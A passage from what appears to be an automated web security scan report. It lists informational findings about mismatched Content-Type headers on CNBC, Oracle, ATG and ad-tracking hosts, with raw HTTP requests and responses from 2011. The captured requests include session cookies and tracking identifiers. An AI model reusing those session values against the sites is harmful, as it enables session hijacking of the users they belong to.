GET /v3/?2=%7B%22keyword%22%3A%22ATG%20e-commerce%20solutio%22%2C%22engine%22%3A%22google%22%2C%22type%22%3A1130%2C%22siteId%22%3A192207%2C%22visitId%22%3A%2261fa95dde8b04fea813e6b6d7c001cc3%22%2C%22pageId%22%3A138100185%7D&AC=FQtL8KWd11&FI=af9c9728-972d-4d0e-a752-6b723d873326 HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
Origin: http://www.readwriteweb.com
X-REQUESTED-WITH: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST
Access-Control-Max-Age: 604800
Access-Control-Allow-Headers: ORIGIN, X-REQUESTED-WITH
Content-Length: 2
Date: Tue, 06 Sep 2011 15:32:54 GMT
Connection: close

{}

31.51. http://m.cnbc.com/mytest/ipecho.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://m.cnbc.com
Path:	/mytest/ipecho.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

31.52. http://media.cnbc.com/i/CNBC/CNBC_Images/video/cur_video_share.jpg/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://media.cnbc.com
Path:	/i/CNBC/CNBC_Images/video/cur_video_share.jpg/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /i/CNBC/CNBC_Images/video/cur_video_share.jpg/ HTTP/1.1
Host: media.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 28
Date: Tue, 06 Sep 2011 15:04:56 GMT
Connection: close
Cache-Control: public, max-age=86400
X-N: S

<h1>404 Image Not Found</h1>

31.53. http://media.cnbc.com/i/CNBC/CNBC_Images/video/cur_video_share_over.jpg/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://media.cnbc.com
Path:	/i/CNBC/CNBC_Images/video/cur_video_share_over.jpg/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /i/CNBC/CNBC_Images/video/cur_video_share_over.jpg/ HTTP/1.1
Host: media.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.54. http://media.cnbc.com/i/CNBC/CNBC_Images/video/vid_control_/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://media.cnbc.com
Path:	/i/CNBC/CNBC_Images/video/vid_control_/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /i/CNBC/CNBC_Images/video/vid_control_/ HTTP/1.1
Host: media.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.55. http://media.cnbc.com/i/CNBC/Components/FlashVideo/flashVideoPlayerv81 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://media.cnbc.com
Path:	/i/CNBC/Components/FlashVideo/flashVideoPlayerv81

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /i/CNBC/Components/FlashVideo/flashVideoPlayerv81 HTTP/1.1
Host: media.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 28
Date: Tue, 06 Sep 2011 15:04:59 GMT
Connection: close
Cache-Control: public, max-age=86400
X-N: S

<h1>404 Image Not Found</h1>

31.56. http://media.cnbc.com/i/CNBC/Components/FlashVideo/inline/flashVideoPlayerv14 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://media.cnbc.com
Path:	/i/CNBC/Components/FlashVideo/inline/flashVideoPlayerv14

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /i/CNBC/Components/FlashVideo/inline/flashVideoPlayerv14 HTTP/1.1
Host: media.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 28
Date: Tue, 06 Sep 2011 15:05:00 GMT
Connection: close
Cache-Control: public, max-age=86400
X-N: S

<h1>404 Image Not Found</h1>

31.57. http://media.cnbc.com/j/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PEOPLE/R/ROUBINI_NOURIEL/nouriel previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://media.cnbc.com
Path:	/j/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PEOPLE/R/ROUBINI_NOURIEL/nouriel

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /j/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PEOPLE/R/ROUBINI_NOURIEL/nouriel HTTP/1.1
Host: media.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 28
Date: Tue, 06 Sep 2011 15:05:00 GMT
Connection: close
Cache-Control: public, max-age=86400
X-N: S

<h1>404 Image Not Found</h1>

31.58. https://myprofile.oracle.com/EndUser/images/fading-background.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/images/fading-background.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

31.59. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/images/logo-oracle-red.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

31.60. https://myprofile.oracle.com/EndUser/jscripts/s_code.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_code.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.61. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_code_popup.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.62. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_code_profile.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.63. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_validation.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.64. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://netsuite-www.baynote.net
Path:	/baynote/tags2/guide/results-products/netsuite-www

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript;charset=ISO-8859-1

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

31.65. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://netsuite.tt.omtrdc.net
Path:	/m2/netsuite/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test&mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40 HTTP/1.1
Host: netsuite.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

31.66. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

Response

31.67. https://oracleus.wingateweb.com/portal/dwr/interface/PortalAjax.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://oracleus.wingateweb.com
Path:	/portal/dwr/interface/PortalAjax.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

Response

31.68. http://ping.crowdscience.com/ping.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ping.crowdscience.com
Path:	/ping.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ping.js?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1315341159227&c=0&t=0&v=0&m=0&vn=2.0.4 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b

Response

31.69. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.70. https://register.cnbc.com/RandomImage.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://register.cnbc.com
Path:	/RandomImage.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a JPEG image.

Request

Response

31.71. http://rt.disqus.com/forums/realtime-cached.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rt.disqus.com
Path:	/forums/realtime-cached.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /forums/realtime-cached.js?timestamp=2011-09-06_11:32:37&thread_id=188845576&f=readwriteenterprise&1315341172995 HTTP/1.1
Host: rt.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; __utma=113869458.1840189074.1315055753.1315138435.1315341172.5; __utmb=113869458.1.10.1315341172; __utmc=113869458; __utmz=113869458.1315341172.5.5.utmcsr=readwriteweb.com|utmccn=(referral)|utmcmd=referral|utmcct=/enterprise/2010/11/oracle.php

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:33:08 GMT
Content-Type: application/x-javascript
Content-Length: 67
Last-Modified: Mon, 17 Jan 2011 19:57:15 GMT
Connection: close
Accept-Ranges: bytes

DISQUS.dtpl.actions.fire("realtime.update", "2010-12-08_19:48:43")

31.72. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

31.73. http://rww.readwriteweb.netdna-cdn.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rww.readwriteweb.netdna-cdn.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: rww.readwriteweb.netdna-cdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Tue, 06 Sep 2011 15:33:13 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Sun, 16 Dec 2007 08:22:21 GMT
ETag: "37e-44162fe9ac940"
Content-Length: 894

..............h.......(....... ..............................................................................................................................................&%.ff.pr.rs....ba..........
...[SNIP]...

31.74. http://s7.addthis.com/js/addthis_widget.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://s7.addthis.com
Path:	/js/addthis_widget.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /js/addthis_widget.php?v=12 HTTP/1.1
Host: s7.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/technetwork/community/developer-vm/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,70|36

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 25 Aug 2011 11:55:32 GMT
ETag: "f82260-bce7-4ab531b177500"
Accept-Ranges: bytes
Content-Length: 48359
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 16:12:49 GMT
Connection: close
Vary: Accept-Encoding

/* (c) 2008, 2009, 2010 Add This, LLC */
var addthis_conf={ver:120};function addthis_to(a){return addthis_sendto(a)}function addthis_onmouseover(b,f,d,c,h,a,g){if(h){addthis_config.username=h}if(a){ad
...[SNIP]...

31.75. http://server.iad.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://server.iad.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=52793056 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://server.iad.liveperson.net/lpWeb/default_SMB//hcpv/emt/mtag.js?site=52793056
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1320"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:29 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

31.76. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]

Response

31.77. http://sophelle.app5.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sophelle.app5.hubspot.com
Path:	/salog.js.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.78. http://subplyevents.cloudapp.net/AddEvent.aspx/061BB857AFEC5D2E9B3ACD2683E66EA8B0CF3633/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://subplyevents.cloudapp.net
Path:	/AddEvent.aspx/061BB857AFEC5D2E9B3ACD2683E66EA8B0CF3633/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /AddEvent.aspx/061BB857AFEC5D2E9B3ACD2683E66EA8B0CF3633/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null HTTP/1.1
Host: subplyevents.cloudapp.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=psptntif5pl0d3v1qhlvb2z3; path=/; HttpOnly
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:13:10 GMT
Content-Length: 101

Video Event: 061BB857AFEC5D2E9B3ACD2683E66EA8B0CF3633 - f979c890-22ec-412f-8e2c-df70d1568052 - oracle

31.79. http://subplyevents.cloudapp.net/AddEvent.aspx/0CE9D6956B7A0FCD1E99F1E8A802B1EDB8F1B59A/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://subplyevents.cloudapp.net
Path:	/AddEvent.aspx/0CE9D6956B7A0FCD1E99F1E8A802B1EDB8F1B59A/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /AddEvent.aspx/0CE9D6956B7A0FCD1E99F1E8A802B1EDB8F1B59A/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null HTTP/1.1
Host: subplyevents.cloudapp.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=piy2pjshxmaa22dmacqth3bt

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:14:36 GMT
Content-Length: 101

Video Event: 0CE9D6956B7A0FCD1E99F1E8A802B1EDB8F1B59A - f979c890-22ec-412f-8e2c-df70d1568052 - oracle

31.80. http://subplyevents.cloudapp.net/AddEvent.aspx/1B862009340CE9937F3D91AB6CCA134E42777EEE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://subplyevents.cloudapp.net
Path:	/AddEvent.aspx/1B862009340CE9937F3D91AB6CCA134E42777EEE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /AddEvent.aspx/1B862009340CE9937F3D91AB6CCA134E42777EEE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null HTTP/1.1
Host: subplyevents.cloudapp.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=piy2pjshxmaa22dmacqth3bt

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:14:37 GMT
Content-Length: 101

Video Event: 1B862009340CE9937F3D91AB6CCA134E42777EEE - f979c890-22ec-412f-8e2c-df70d1568052 - oracle

31.81. http://subplyevents.cloudapp.net/AddEvent.aspx/DA52446C4D2F6699FE9CD584FA3631B533E893CE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://subplyevents.cloudapp.net
Path:	/AddEvent.aspx/DA52446C4D2F6699FE9CD584FA3631B533E893CE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /AddEvent.aspx/DA52446C4D2F6699FE9CD584FA3631B533E893CE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null HTTP/1.1
Host: subplyevents.cloudapp.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=piy2pjshxmaa22dmacqth3bt; path=/; HttpOnly
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:13:10 GMT
Content-Length: 101

Video Event: DA52446C4D2F6699FE9CD584FA3631B533E893CE - f979c890-22ec-412f-8e2c-df70d1568052 - oracle

31.82. http://tps31.doubleverify.com/visit.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tps31.doubleverify.com
Path:	/visit.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.83. http://wd.sharethis.com/api/getCount2.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://wd.sharethis.com
Path:	/api/getCount2.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.84. http://www.atg.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.atg.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.1.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 19 Jul 2010 15:33:55 GMT
ETag: "60643-8f6-48bbf4be29ec0"
Accept-Ranges: bytes
Content-Length: 2294
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=26796
Expires: Tue, 06 Sep 2011 22:59:07 GMT
Date: Tue, 06 Sep 2011 15:32:31 GMT
Connection: close

..............h...&...........h.......(....... ...........@....................]...R...u.......e.......Y...a...$...............$.......u.......4...........3...M...........)...Y.......A...............
...[SNIP]...

31.85. http://www.atg.com/svc-common/script/propertyFunc.js.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.atg.com
Path:	/svc-common/script/propertyFunc.js.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

